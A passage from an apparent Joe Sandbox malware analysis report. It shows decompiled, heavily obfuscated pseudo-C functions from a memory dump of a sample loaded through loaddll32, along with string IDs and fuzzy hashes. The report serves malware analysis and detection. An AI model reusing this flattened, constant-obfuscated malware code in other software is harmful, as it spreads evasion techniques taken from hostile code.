                          				_v164 = _v164 ^ 0x644c870b;
                          				_v164 = _v164 >> 0xd;
                          				_v164 = _v164 * 0x7a;
                          				_v164 = _v164 ^ 0x017eec74;
                          				_v180 = 0x53df1b;
                          				_v180 = _v180 / _t363;
                          				_v180 = _v180 + 0xffff91ff;
                          				_v180 = _v180 + 0xffff90b6;
                          				_v180 = _v180 ^ 0x000d2df2;
                          				_v76 = 0x6cb33c;
                          				_v76 = _v76 + 0x7c19;
                          				_v76 = _v76 ^ 0x0065748e;
                          				_v160 = 0xaee8e0;
                          				_t364 = 0x3e;
                          				_v160 = _v160 / _t364;
                          				_v160 = _v160 + 0x21f3;
                          				_v160 = _v160 * 0x52;
                          				_v160 = _v160 ^ 0x00ffda9d;
                          				_v84 = 0xdaab99;
                          				_v84 = _v84 >> 0xc;
                          				_v84 = _v84 ^ 0x000be4ff;
                          				_v144 = 0x6cc9e4;
                          				_v144 = _v144 >> 5;
                          				_v144 = _v144 ^ 0xa5290d0e;
                          				_v144 = _v144 ^ 0xa52e4d3d;
                          				_v120 = 0x3bbeb9;
                          				_v120 = _v120 ^ 0x393aef05;
                          				_v120 = _v120 + 0x22c7;
                          				_v120 = _v120 ^ 0x39070acc;
                          				_v148 = 0xc13163;
                          				_v148 = _v148 ^ 0x61e09c7e;
                          				_v148 = _v148 + 0x1cd6;
                          				_v148 = _v148 ^ 0x612c2d34;
                          				_v128 = 0x26c56f;
                          				_v128 = _v128 >> 2;
                          				_v128 = _v128 | 0xf6250b40;
                          				_v128 = _v128 ^ 0xf621b77e;
                          				_v176 = 0xf92ffc;
                          				_v176 = _v176 << 4;
                          				_v176 = _v176 ^ 0x602a8fe3;
                          				_v176 = _v176 >> 7;
                          				_v176 = _v176 ^ 0x00d9f38d;
                          				_v124 = 0x433c84;
                          				_v124 = _v124 + 0xffff4128;
                          				_v124 = _v124 ^ 0x1ed7562a;
                          				_v124 = _v124 ^ 0x1e92a094;
                          				_v132 = 0x6b8ec6;
                          				_v132 = _v132 ^ 0x28d18ae0;
                          				_t365 = 0x6a;
                          				_v132 = _v132 * 0x7b;
                          				_v132 = _v132 ^ 0x9158c057;
                          				_v104 = 0x1fefeb;
                          				_v104 = _v104 >> 0xf;
                          				_v104 = _v104 + 0xffff5efe;
                          				_v104 = _v104 ^ 0xfff4cbde;
                          				_v168 = 0xc1bc7b;
                          				_v168 = _v168 >> 3;
                          				_v168 = _v168 << 7;
                          				_v168 = _v168 * 0x7d;
                          				_v168 = _v168 ^ 0xe998ae80;
                          				_v64 = 0x9d5223;
                          				_v64 = _v64 | 0x29ada36c;
                          				_v64 = _v64 ^ 0x29b66376;
                          				_v184 = 0x42d2c5;
                          				_v184 = _v184 + 0xffffd8f9;
                          				_v184 = _v184 | 0x10a03a14;
                          				_v184 = _v184 << 8;
                          				_v184 = _v184 ^ 0xe2b073c1;
                          				_v192 = 0xa502eb;
                          				_v192 = _v192 ^ 0xb81d0436;
                          				_v192 = _v192 >> 0xd;
                          				_v192 = _v192 / _t365;
                          				_v192 = _v192 ^ 0x000463de;
                          				_v172 = 0x9c405d;
                          				_v172 = _v172 >> 6;
                          				_v172 = _v172 ^ 0x75940441;
                          				_v172 = _v172 + 0xd268;
                          				_v172 = _v172 ^ 0x759b0547;
                          				_v156 = 0x9f3fdd;
                          				_v156 = _v156 >> 3;
                          				_v156 = _v156 << 9;
                          				_v156 = _v156 >> 0xd;
                          				_v156 = _v156 ^ 0x000ada21;
                          				_v188 = 0xfbaf85;
                          				_v188 = _v188 | 0xf8737d3a;
                          				_t366 = 0x3c;
                          				_v188 = _v188 / _t366;
                          				_v188 = _v188 ^ 0x0422aead;
                          				_v112 = 0x7705bd;
                          				_v112 = _v112 | 0xb4ba0e14;
                          				_v112 = _v112 * 0x43;
                          				_v112 = _v112 ^ 0x5ec93514;
                          				_v96 = 0xe3e42a;
                          				_v96 = _v96 ^ 0x25c7ee45;
                          				_v96 = _v96 ^ 0x252c54ca;
                          				_v68 = 0xae646d;
                          				_v68 = _v68 + 0xcc0;
                          				_v68 = _v68 ^ 0x00a4113a;
                          				_v140 = 0x4c7529;
                          				_t367 = 0x73;
                          				_v140 = _v140 / _t367;
                          				_v140 = _v140 | 0x6ffaa740;
                          				_v140 = _v140 ^ 0x6ff9ac12;
                          				_v152 = 0xafca7f;
                          				_v152 = _v152 + 0xfffffd29;
                          				_v152 = _v152 + 0xad57;
                          				_v152 = _v152 + 0x26e2;
                          				_v152 = _v152 ^ 0x00ba4152;
                          				goto L1;
                          				do {
                          					while(1) {
                          						L1:
                          						_t407 = _t370 - 0x696b508;
                          						if(_t407 > 0) {
                          							break;
                          						}
                          						if(_t407 == 0) {
                          							_t401[1] = E00D3F369(_t402);
                          							_t370 = 0x4c1a8a5;
                          							continue;
                          						} else {
                          							if(_t370 == 0xc5526f) {
                          								_t370 = 0x696b508;
                          								 *_t401 =  *_t401 & 0x00000000;
                          								_t401[1] = _v100;
                          								continue;
                          							} else {
                          								if(_t370 == 0x1aa419f) {
                          									E00D40A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
                          									_t405 =  &(_t405[4]);
                          									_t370 = 0x68c33a9;
                          									continue;
                          								} else {
                          									if(_t370 == 0x4c1a8a5) {
                          										_push(_t370);
                          										_push(_t370);
                          										_t352 = E00D3C5D8(_t401[1]);
                          										_t405 =  &(_t405[3]);
                          										 *_t401 = _t352;
                          										__eflags = _t352;
                          										if(__eflags != 0) {
                          											_t370 = 0x8344534;
                          											continue;
                          										}
                          									} else {
                          										if(_t370 == 0x642ef10) {
                          											E00D4CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
                          											_t405 =  &(_t405[3]);
                          											_t370 = 0x7d262d1;
                          											continue;
                          										} else {
                          											if(_t370 != 0x68c33a9) {
                          												goto L25;
                          											} else {
                          												E00D40A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
                          												_t405 =  &(_t405[4]);
                          												_t370 = 0x6a3d126;
                          												continue;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						goto L26;
                          					}
                          					__eflags = _t370 - 0x6a3d126;
                          					if(__eflags == 0) {
                          						E00D4CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
                          						_t405 =  &(_t405[3]);
                          						_t370 = 0x2431b15;
                          						goto L25;
                          					} else {
                          						__eflags = _t370 - 0x7d262d1;
                          						if(_t370 == 0x7d262d1) {
                          							E00D40A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
                          							_t405 =  &(_t405[4]);
                          							_t370 = 0xabb5672;
                          							goto L1;
                          						} else {
                          							__eflags = _t370 - 0x8344534;
                          							if(_t370 == 0x8344534) {
                          								E00D322A6(_t401, _v92,  &_v60, _v116);
                          								_t405 =  &(_t405[2]);
                          								_t370 = 0x642ef10;
                          								goto L1;
                          							} else {
                          								__eflags = _t370 - 0x94f1f5a;
                          								if(_t370 == 0x94f1f5a) {
                          									E00D40A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
                          									_t405 =  &(_t405[4]);
                          									_t370 = 0x1aa419f;
                          									goto L1;
                          								} else {
                          									__eflags = _t370 - 0xabb5672;
                          									if(_t370 != 0xabb5672) {
                          										goto L25;
                          									} else {
                          										E00D40A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
                          										_t405 =  &(_t405[4]);
                          										_t370 = 0x94f1f5a;
                          										goto L1;
                          									}
                          								}
                          							}
                          						}
                          					}
                          					break;
                          					L25:
                          					__eflags = _t370 - 0x2431b15;
                          				} while (__eflags != 0);
                          				L26:
                          				__eflags =  *_t401;
                          				_t313 =  *_t401 != 0;
                          				__eflags = _t313;
                          				return 0 | _t313;
                          			}

                          0x00d37ce0
                          0x00d37ce4
                          0x00d37ce9
                          0x00d37cec
                          0x00d37cee
                          0x00d37cf0
                          0x00d37cf6
                          0x00000000
                          0x00d37cf6
                          0x00d37c61
                          0x00d37c67
                          0x00d37cb7
                          0x00d37cbc
                          0x00d37cbf
                          0x00000000
                          0x00d37c69
                          0x00d37c6f
                          0x00000000
                          0x00d37c75
                          0x00d37c90
                          0x00d37c95
                          0x00d37c98
                          0x00000000
                          0x00d37c98
                          0x00d37c6f
                          0x00d37c67
                          0x00d37c5f
                          0x00d37c53
                          0x00d37c47
                          0x00000000
                          0x00d37c3b
                          0x00d37d52
                          0x00d37d58
                          0x00d37e4e
                          0x00d37e53
                          0x00d37e56
                          0x00000000
                          0x00d37d5e
                          0x00d37d5e
                          0x00d37d64
                          0x00d37e21
                          0x00d37e26
                          0x00d37e29
                          0x00000000
                          0x00d37d6a
                          0x00d37d6a
                          0x00d37d6c
                          0x00d37dee
                          0x00d37df3
                          0x00d37df6
                          0x00000000
                          0x00d37d6e
                          0x00d37d6e
                          0x00d37d74
                          0x00d37dca
                          0x00d37dcf
                          0x00d37dd2
                          0x00000000
                          0x00d37d76
                          0x00d37d76
                          0x00d37d7c
                          0x00000000
                          0x00d37d82
                          0x00d37d9d
                          0x00d37da2
                          0x00d37da5
                          0x00000000
                          0x00d37da5
                          0x00d37d7c
                          0x00d37d74
                          0x00d37d6c
                          0x00d37d64
                          0x00000000
                          0x00d37e5b
                          0x00d37e5b
                          0x00d37e5b
                          0x00d37e67
                          0x00d37e69
                          0x00d37e6e
                          0x00d37e6e
                          0x00d37e78

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )uL$*$0i^$4-,a$sG'$&$[}
                          • API String ID: 0-4036371101
                          • Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
                          • Instruction ID: 6f1e85f244d8d5bfe10f10c35e6fd2c35d1018aea2a9ff848e7f247a002a4391
                          • Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
                          • Instruction Fuzzy Hash: 98F132B1508785DFD3A8CF21C48AA5BBBF1FB94308F50891DF69A86220D7B58949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00D36B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
                          				char _v76;
                          				intOrPtr _v80;
                          				char _v84;
                          				intOrPtr _v88;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				intOrPtr _v100;
                          				char _v108;
                          				signed int _v112;
                          				char _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				void* _t242;
                          				void* _t265;
                          				void* _t269;
                          				signed int _t271;
                          				signed int _t272;
                          				char* _t274;
                          				signed int _t275;
                          				intOrPtr _t282;
                          				intOrPtr* _t285;
                          				void* _t287;
                          				signed int _t292;
                          				intOrPtr _t298;
                          				intOrPtr _t324;
                          				intOrPtr* _t326;
                          				signed int _t327;
                          				signed int _t328;
                          				signed int _t329;
                          				signed int _t330;
                          				signed int _t331;
                          				signed int _t332;
                          				signed int _t333;
                          				signed int _t334;
                          				void* _t336;
                          				void* _t337;
                          
                          				_t285 = _a8;
                          				_push(_t285);
                          				_push(_a4);
                          				_t326 = __edx;
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_t242);
                          				_v100 = 0x757930;
                          				_t337 = _t336 + 0x10;
                          				_v96 = 0xd80ad;
                          				_t324 = 0;
                          				_v92 = 0x3caa7;
                          				_v88 = 0;
                          				_t287 = 0x43d278a;
                          				_v140 = 0xa476d3;
                          				_v140 = _v140 + 0x8b71;
                          				_v140 = _v140 ^ 0x00a50244;
                          				_v192 = 0x86f1c9;
                          				_v192 = _v192 | 0xd7b81b76;
                          				_t327 = 0x1d;
                          				_v192 = _v192 / _t327;
                          				_v192 = _v192 + 0xffff13d4;
                          				_v192 = _v192 ^ 0x076f980a;
                          				_v188 = 0x843aad;
                          				_v188 = _v188 << 0x10;
                          				_v188 = _v188 | 0xc1fad14f;
                          				_t328 = 0x74;
                          				_v188 = _v188 * 0x5b;
                          				_v188 = _v188 ^ 0x93eb17e1;
                          				_v168 = 0x8317bb;
                          				_v168 = _v168 ^ 0x1362ec48;
                          				_v168 = _v168 ^ 0x4008a55c;
                          				_v168 = _v168 ^ 0x53e7b525;
                          				_v144 = 0x20a76b;
                          				_v144 = _v144 / _t328;
                          				_v144 = _v144 ^ 0x000a47fb;
                          				_v196 = 0xe0aa92;
                          				_v196 = _v196 ^ 0x05a4f46c;
                          				_t329 = 0x24;
                          				_v196 = _v196 / _t329;
                          				_v196 = _v196 << 8;
                          				_v196 = _v196 ^ 0x257ea781;
                          				_v200 = 0xe588c5;
                          				_t330 = 0x29;
                          				_v200 = _v200 / _t330;
                          				_v200 = _v200 >> 6;
                          				_v200 = _v200 >> 0x10;
                          				_v200 = _v200 ^ 0x000d5940;
                          				_v164 = 0x4155a9;
                          				_v164 = _v164 >> 5;
                          				_v164 = _v164 | 0x5ba52662;
                          				_v164 = _v164 ^ 0x5ba55520;
                          				_v160 = 0x4466c5;
                          				_v160 = _v160 >> 9;
                          				_v160 = _v160 >> 3;
                          				_v160 = _v160 ^ 0x000d6457;
                          				_v148 = 0x35624e;
                          				_v148 = _v148 >> 0x10;
                          				_v148 = _v148 ^ 0x000abf08;
                          				_v172 = 0x5696ab;
                          				_v172 = _v172 + 0xe488;
                          				_v172 = _v172 + 0x10cb;
                          				_v172 = _v172 ^ 0x0055d7ec;
                          				_v128 = 0xad635c;
                          				_v128 = _v128 ^ 0xb55b0f96;
                          				_v128 = _v128 ^ 0xb5f22a9b;
                          				_v208 = 0x275835;
                          				_t108 =  &_v208; // 0x275835
                          				_t331 = 0x37;
                          				_push("true");
                          				_v208 =  *_t108 / _t331;
                          				_v208 = _v208 ^ 0xb04b577b;
                          				_pop(_t332);
                          				_v208 = _v208 / _t332;
                          				_v208 = _v208 ^ 0x055d5c1c;
                          				_v132 = 0x1cc441;
                          				_t333 = 0x6a;
                          				_v132 = _v132 / _t333;
                          				_v132 = _v132 ^ 0x000e83d7;
                          				_v204 = 0x125b67;
                          				_v204 = _v204 >> 5;
                          				_v204 = _v204 ^ 0xe127959b;
                          				_v204 = _v204 << 0x10;
                          				_v204 = _v204 ^ 0x07419ea5;
                          				_v180 = 0x68abbe;
                          				_v180 = _v180 | 0x57b8f8fa;
                          				_v180 = _v180 << 0xf;
                          				_v180 = _v180 ^ 0x7df5736a;
                          				_v156 = 0x6240f4;
                          				_v156 = _v156 + 0xffffe0b8;
                          				_t334 = 0x69;
                          				_v156 = _v156 * 0x13;
                          				_v156 = _v156 ^ 0x0741ad16;
                          				_v124 = 0xa95440;
                          				_v124 = _v124 / _t334;
                          				_v124 = _v124 ^ 0x00021dd5;
                          				_v176 = 0x6e61ec;
                          				_v176 = _v176 + 0x7ec3;
                          				_v176 = _v176 | 0x8e41022f;
                          				_v176 = _v176 ^ 0x8e60c50b;
                          				_v120 = 0x9285fa;
                          				_v120 = _v120 ^ 0x677ff2d5;
                          				_v120 = _v120 ^ 0x67e9a1bb;
                          				_v152 = 0x5286f5;
                          				_v152 = _v152 + 0xffff3b7a;
                          				_v152 = _v152 ^ 0x016928ba;
                          				_v152 = _v152 ^ 0x013cf174;
                          				_v184 = 0xd65a61;
                          				_v184 = _v184 * 0x45;
                          				_v184 = _v184 + 0xffff6116;
                          				_v184 = _v184 ^ 0x39cc51e9;
                          				_v136 = 0xa284b3;
                          				_v136 = _v136 + 0x4b38;
                          				_v136 = _v136 ^ 0x00a4fd93;
                          				while(_t287 != 0x1b81945) {
                          					if(_t287 == 0x314f545) {
                          						_t265 = E00D546BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
                          						_t337 = _t337 + 0x10;
                          						if(_t265 == 0) {
                          							L25:
                          							return _t324;
                          						}
                          						_t287 = 0x958f9d6;
                          						continue;
                          					}
                          					if(_t287 == 0x43d278a) {
                          						_t287 = 0xee3ea02;
                          						continue;
                          					}
                          					if(_t287 == 0x55d8418) {
                          						_t292 = _v172;
                          						_t269 = E00D507AA(_t292, _v128,  &_v84, _v208,  &_v76);
                          						_t337 = _t337 + 0xc;
                          						if(_t269 != 0) {
                          							_push(_t292);
                          							_push(_t292);
                          							_t282 = E00D3C5D8(_v80);
                          							_t337 = _t337 + 0xc;
                          							 *_t326 = _t282;
                          							if(_t282 != 0) {
                          								E00D4C9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
                          								_t337 = _t337 + 0x10;
                          								 *((intOrPtr*)(_t326 + 4)) = _v80;
                          								_t324 = 1;
                          							}
                          						}
                          						_t287 = 0x1b81945;
                          						continue;
                          					}
                          					if(_t287 == 0x958f9d6) {
                          						_t271 = E00D3C473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
                          						_t337 = _t337 + 0x10;
                          						asm("sbb ecx, ecx");
                          						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
                          						continue;
                          					}
                          					if(_t287 != 0xee3ea02) {
                          						L24:
                          						if(_t287 != 0x1eefa0b) {
                          							continue;
                          						}
                          						goto L25;
                          					}
                          					_t272 =  *((intOrPtr*)(_t285 + 4));
                          					_t298 =  *_t285;
                          					_v112 = _t272;
                          					_v116 = _t298;
                          					_t274 = _t272 - 1 + _t298;
                          					while(_t274 > _t298) {
                          						if( *_t274 == 0) {
                          							break;
                          						}
                          						_t274 = _t274 - 1;
                          					}
                          					_t275 = _t274 - _t298;
                          					_v112 = _t275;
                          					if(_t275 == 0) {
                          						L14:
                          						_t287 = 0x314f545;
                          						continue;
                          					}
                          					while(_v112 % _v192 != _v140) {
                          						_t207 =  &_v112;
                          						 *_t207 = _v112 - 1;
                          						if( *_t207 != 0) {
                          							continue;
                          						}
                          						goto L14;
                          					}
                          					goto L14;
                          				}
                          				E00D52B09(_v152, _v108, _v184, _v136);
                          				_t287 = 0x1eefa0b;
                          				goto L24;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
                          • API String ID: 0-1112794312
                          • Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
                          • Instruction ID: 70b9d93c17faba2188485990b31699f3038476259575591815cf508777e8421b
                          • Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
                          • Instruction Fuzzy Hash: 33C142715083809FD328CF66D54AA2BBBF1FBC5748F10891DF69A86260D7B2C949CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00D4DC71() {
                          				signed int _v4;
                          				char _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				void* _t246;
                          				intOrPtr* _t248;
                          				signed int _t254;
                          				intOrPtr _t255;
                          				intOrPtr* _t256;
                          				signed int _t257;
                          				signed int _t258;
                          				signed int _t259;
                          				signed int _t260;
                          				signed int _t261;
                          				signed int _t262;
                          				void* _t263;
                          				void* _t290;
                          				signed int* _t294;
                          
                          				_t294 =  &_v108;
                          				_v28 = 0x1aa6a3;
                          				_v28 = _v28 >> 4;
                          				_v28 = _v28 ^ 0x8001aa6b;
                          				_v68 = 0xf966b1;
                          				_v68 = _v68 | 0xf5f58fdd;
                          				_v4 = 0;
                          				_t290 = 0xa5173af;
                          				_t257 = 0x26;
                          				_v68 = _v68 / _t257;
                          				_v68 = _v68 ^ 0x0679357b;
                          				_v108 = 0xb8ff00;
                          				_v108 = _v108 | 0x28c12dd3;
                          				_t258 = 0x42;
                          				_v108 = _v108 / _t258;
                          				_v108 = _v108 + 0x2548;
                          				_v108 = _v108 ^ 0x0093f641;
                          				_v80 = 0x4a20cb;
                          				_v80 = _v80 | 0x50657e73;
                          				_v80 = _v80 >> 7;
                          				_v80 = _v80 ^ 0x00ac2c39;
                          				_v84 = 0x6237d1;
                          				_v84 = _v84 ^ 0x87c50ead;
                          				_v84 = _v84 << 4;
                          				_v84 = _v84 ^ 0x7a73b039;
                          				_v88 = 0x617a8;
                          				_v88 = _v88 << 0xa;
                          				_v88 = _v88 >> 0xc;
                          				_v88 = _v88 ^ 0x00004866;
                          				_v96 = 0x113f2;
                          				_v96 = _v96 + 0x334b;
                          				_v96 = _v96 << 0xb;
                          				_v96 = _v96 ^ 0x0285e17a;
                          				_v96 = _v96 ^ 0x08b84672;
                          				_v60 = 0x4bd9b6;
                          				_v60 = _v60 ^ 0x6ba7848f;
                          				_v60 = _v60 | 0xa40fa4df;
                          				_v60 = _v60 ^ 0xefe49c55;
                          				_v100 = 0xb12c48;
                          				_v100 = _v100 >> 0xf;
                          				_v100 = _v100 ^ 0x0d420031;
                          				_t259 = 0x33;
                          				_v100 = _v100 / _t259;
                          				_v100 = _v100 ^ 0x004184fb;
                          				_v104 = 0x387c2e;
                          				_v104 = _v104 << 5;
                          				_t260 = 0x72;
                          				_v104 = _v104 / _t260;
                          				_v104 = _v104 >> 0xc;
                          				_v104 = _v104 ^ 0x0003fa0e;
                          				_v64 = 0x9254d3;
                          				_v64 = _v64 ^ 0xec8ec683;
                          				_v64 = _v64 + 0xffff5a55;
                          				_v64 = _v64 ^ 0xec1fa99d;
                          				_v72 = 0xb608b;
                          				_v72 = _v72 + 0xffffc85a;
                          				_t261 = 0x43;
                          				_v72 = _v72 / _t261;
                          				_v72 = _v72 ^ 0x00012617;
                          				_v32 = 0x2b47af;
                          				_t262 = 0x73;
                          				_t254 = _v4;
                          				_v32 = _v32 / _t262;
                          				_v32 = _v32 ^ 0x0007dbbc;
                          				_v76 = 0xa2cc58;
                          				_v76 = _v76 * 0x79;
                          				_v76 = _v76 + 0x1556;
                          				_v76 = _v76 ^ 0x4cf4e816;
                          				_v36 = 0x411f8a;
                          				_v36 = _v36 ^ 0x039a7593;
                          				_v36 = _v36 ^ 0x03d0076c;
                          				_v48 = 0x32f559;
                          				_v48 = _v48 + 0x88cf;
                          				_v48 = _v48 >> 4;
                          				_v48 = _v48 ^ 0x000c1178;
                          				_v92 = 0xe53134;
                          				_v92 = _v92 + 0xffffd6c4;
                          				_v92 = _v92 + 0xfffff637;
                          				_v92 = _v92 ^ 0x9e819fd3;
                          				_v92 = _v92 ^ 0x9e661668;
                          				_v52 = 0x962c48;
                          				_v52 = _v52 + 0x54df;
                          				_v52 = _v52 << 4;
                          				_v52 = _v52 ^ 0x096c20fe;
                          				_v56 = 0x38983;
                          				_v56 = _v56 * 0x7b;
                          				_v56 = _v56 ^ 0x1e2e8742;
                          				_v56 = _v56 ^ 0x1f9fc20c;
                          				_v20 = 0x39c3;
                          				_v20 = _v20 ^ 0xdc0c04ea;
                          				_v20 = _v20 ^ 0xdc0d303f;
                          				_v44 = 0xdd799f;
                          				_v44 = _v44 + 0xffffa96c;
                          				_v44 = _v44 >> 0xc;
                          				_v44 = _v44 ^ 0x0003bcd5;
                          				_v24 = 0x7b2b38;
                          				_v24 = _v24 * 0x48;
                          				_v24 = _v24 ^ 0x22aaeece;
                          				_v40 = 0x38897c;
                          				_v40 = _v40 >> 0xe;
                          				_v40 = _v40 | 0xf4a0afb0;
                          				_v40 = _v40 ^ 0xf4ac49e4;
                          				_v12 = 0x92ab49;
                          				_v12 = _v12 ^ 0x4b1e6875;
                          				_v12 = _v12 ^ 0x4b80c344;
                          				_v16 = 0x5228cc;
                          				_v16 = _v16 | 0xaae3d00d;
                          				_v16 = _v16 ^ 0xaaf963f0;
                          				while(1) {
                          					L1:
                          					_t263 = 0x5c;
                          					while(1) {
                          						_t246 = 0xc02063;
                          						do {
                          							L3:
                          							while(_t290 != 0x13579) {
                          								if(_t290 == _t246) {
                          									_t248 = E00D5298D(_v20, _v44, _v24, _v8, _t254);
                          									_t294 =  &(_t294[3]);
                          									__eflags = _t248;
                          									_t290 = 0x13579;
                          									_v4 = 0 | __eflags == 0x00000000;
                          									goto L1;
                          								} else {
                          									if(_t290 == 0x79b4c83) {
                          										_push(_v88);
                          										_push(_v84);
                          										_push(_v80);
                          										__eflags = E00D32DEA(_v96,  &_v8, _v60, 0xd310a0, _v28, _v100, 0xd310a0, 0xd310a0, _v104, _v64, 0xd310a0, 0xd310a0, _v68, _v72, _v32, _v76, _v36, E00D4E1F8(0xd310a0, _v108, __eflags));
                          										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
                          										E00D4FECB(_t249, _v48, _v92, _v52, _v56);
                          										_t294 =  &(_t294[0x16]);
                          										L16:
                          										_t246 = 0xc02063;
                          										_t263 = 0x5c;
                          									} else {
                          										if(_t290 == 0xa5173af) {
                          											_t290 = 0xac8592e;
                          											continue;
                          										} else {
                          											if(_t290 == 0xac8592e) {
                          												_t255 =  *0xd56214; // 0x0
                          												_t256 = _t255 + 0x23c;
                          												while( *_t256 != _t263) {
                          													_t256 = _t256 + 2;
                          													__eflags = _t256;
                          												}
                          												_t254 = _t256 + 2;
                          												_t290 = 0x79b4c83;
                          												_t246 = 0xc02063;
                          												continue;
                          											}
                          										}
                          									}
                          								}
                          								goto L17;
                          							}
                          							E00D353D0(_v40, _v12, _v16, _v8);
                          							_t290 = 0x61b9dc3;
                          							goto L16;
                          							L17:
                          							__eflags = _t290 - 0x61b9dc3;
                          						} while (__eflags != 0);
                          						return _v4;
                          					}
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .|8$1$41$8+{$H%$fH$s~eP
                          • API String ID: 0-3664284304
                          • Opcode ID: 7d852ee8891dcc3a0a1797d226e82b23177d6d1262eefb9c3250ad912995270d
                          • Instruction ID: 90139d8930b43488c1fd4bd2ad106eed7c74c89299696f2274998035966f669e
                          • Opcode Fuzzy Hash: 7d852ee8891dcc3a0a1797d226e82b23177d6d1262eefb9c3250ad912995270d
                          • Instruction Fuzzy Hash: 10B10F725083809FD368CF25D98A40BFBE2FBC4758F10891DF69A86260D7B98949CF56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00D3670B() {
                          				char _v524;
                          				intOrPtr _v548;
                          				char _v564;
                          				intOrPtr _v568;
                          				intOrPtr _v572;
                          				intOrPtr _v576;
                          				intOrPtr _v584;
                          				char _v588;
                          				signed int _v592;
                          				signed int _v596;
                          				signed int _v600;
                          				signed int _v604;
                          				signed int _v608;
                          				signed int _v612;
                          				signed int _v616;
                          				signed int _v620;
                          				signed int _v624;
                          				signed int _v628;
                          				signed int _v632;
                          				signed int _v636;
                          				signed int _v640;
                          				signed int _v644;
                          				signed int _v648;
                          				signed int _v652;
                          				signed int _v656;
                          				signed int _v660;
                          				signed int _v664;
                          				signed int _v668;
                          				signed int _v672;
                          				signed int _v676;
                          				signed int _v680;
                          				void* _t233;
                          				signed int _t236;
                          				signed int _t238;
                          				void* _t239;
                          				signed int _t241;
                          				signed int _t242;
                          				signed int _t243;
                          				signed int _t244;
                          				signed int _t258;
                          				intOrPtr _t259;
                          				void* _t261;
                          				void* _t266;
                          				void* _t268;
                          
                          				_v576 = 0x5c6bdc;
                          				_v572 = 0xae866a;
                          				_t259 = 0;
                          				_t261 = 0xb8e9ee3;
                          				_v568 = 0;
                          				_v612 = 0xec3aec;
                          				_t5 =  &_v612; // 0xec3aec
                          				_t241 = 0x62;
                          				_v612 =  *_t5 * 0x6c;
                          				_v612 = _v612 | 0xdabeec40;
                          				_v612 = _v612 ^ 0xfbbeff50;
                          				_v604 = 0x37b038;
                          				_v604 = _v604 >> 0xd;
                          				_v604 = _v604 ^ 0x000001bc;
                          				_v624 = 0x7f5f56;
                          				_v624 = _v624 + 0xffff5a99;
                          				_v624 = _v624 << 4;
